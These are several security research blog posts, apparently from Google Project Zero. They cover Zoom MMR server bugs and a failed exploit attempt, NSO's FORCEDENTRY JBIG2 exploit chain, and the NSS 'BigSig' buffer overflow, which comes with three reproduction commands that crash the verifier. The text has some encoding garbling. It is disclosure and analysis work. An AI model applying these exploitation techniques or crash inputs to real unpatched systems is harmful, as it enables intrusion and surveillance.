Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

‚úáGoogle Project Zero

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan ‚ÄĒ

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

      } else if (seg->getType() == jbig2SegCodeTable) {

        codeTables->append(seg);

      }

    } else {

      error(errSyntaxError, getPos(),

            "Invalid segment reference in JBIG2 text region");

      delete codeTables;

      return;

    }

  }

...

  // get the symbol bitmaps

  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        symbolDict = (JBIG2SymbolDict *)seg;

        for (k = 0; k < symbolDict->getSize(); ++k) {

          syms[kk++] = symbolDict->getBitmap(k); // (4)

        }

      }

    }

  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs¬†they can stop the overflow after writing exactly three more JBIG2Bitmap¬†pointers after the end of the segments¬†GList¬†buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap¬†representing the current page.¬†Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000¬†and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w¬†and line¬†fields are likely to be overwritten with 0x1¬†‚ÄĒ the most-significant half of a JBIG2Bitmap¬†pointer) and the segNum¬†and h¬†fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000¬†and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

‚úáGoogle Project Zero

This shouldn't have happened: A vulnerability postmortem

By: Ryan ‚ÄĒ

Posted by Tavis Ormandy, Project Zero

Introduction

This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.

In 2021, all good bugs need a catchy name, so I‚Äôm calling this one ‚ÄúBigSig‚ÄĚ.

First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.

Analysis

Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.

struct VFYContextStr {

   SECOidTag hashAlg; /* the hash algorithm */

   SECKEYPublicKey *key;

   union {

       unsigned char buffer[1];

       unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];

       unsigned char ecdsasig[2 * MAX_ECKEY_LEN];

       unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];

   } u;

   unsigned int pkcs1RSADigestInfoLen;

   unsigned char *pkcs1RSADigestInfo;

   void *wincx;

   void *hashcx;

   const SECHashObject *hashobj;

   SECOidTag encAlg;    /* enc alg */

   PRBool hasSignature;

   SECItem *params;

};

Fig 1. The VFYContext structure from NSS.


The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at
2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.

Okay, but what happens if you just....make a signature that’s bigger than that?

Well, it turns out the answer is memory corruption. Yes, really.


The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.

The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:

# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,

# which contains function pointers (bigger would work too, but takes longer to generate).

$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key

$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...

$ vfychain -a bigsig.cer

Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.

The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are  arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.

           case rsaPssKey:

               sigLen = SECKEY_SignatureLen(key);

               if (sigLen == 0) {

                   /* error set by SECKEY_SignatureLen */

                   rv = SECFailure;

                   break;

               }

               if (sig->len != sigLen) {

                   PORT_SetError(SEC_ERROR_BAD_SIGNATURE);

                   rv = SECFailure;

                   break;

               }

               PORT_Memcpy(cx->u.buffer, sig->data, sigLen);

               break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.

I think this vulnerability raises a few immediate questions:

  • Was this a recent code change or regression that hadn‚Äôt been around long enough to be discovered? No, the original code was checked in¬†with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring¬†in June 2012. In 2017, RSA-PSS support was added¬†and made the same error.

  • Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A‚Äôs works just fine.

  • Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed¬†DER, that‚Äôs about it.

  • Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(),¬†is vulnerable.

  • Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.

  • Is it unexploitable, or otherwise limited impact? No, the hashobj¬†member can be clobbered. That object contains function pointers,¬†which are used immediately.

This wasn’t a process failure, the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, invest in memory safety, fuzzing and test coverage.

NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.

I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.

Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.

  • Did Mozilla have good test coverage for the vulnerable areas? YES.
  • Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
  • Is there a mutator capable of extending ASN1_ITEMs? YES.
  • Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.

How did I find the bug?

I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.

Stack Coverage

The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.

#include <stdio.h>

#include <string.h>

#include <limits.h>

 

static char buf[128];

 

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }

void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }

void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

 

typedef void (* dispatch_t)(int, size_t);

 

dispatch_t handlers[UCHAR_MAX] = {

    cmd_handler_foo,

    cmd_handler_bar,

    cmd_handler_baz,

};

 

int main(int argc, char **argv)

{

    int cmd;

 

    while ((cmd = getchar()) != EOF) {

        if (handlers[cmd]) {

            handlers[cmd](getchar(), getchar());

        }

    }

}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]

To solve this problem, I’ve been experimenting with monitoring the call stack during execution.

The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.

Object Isolation

Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.

The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.

Do these approaches work?

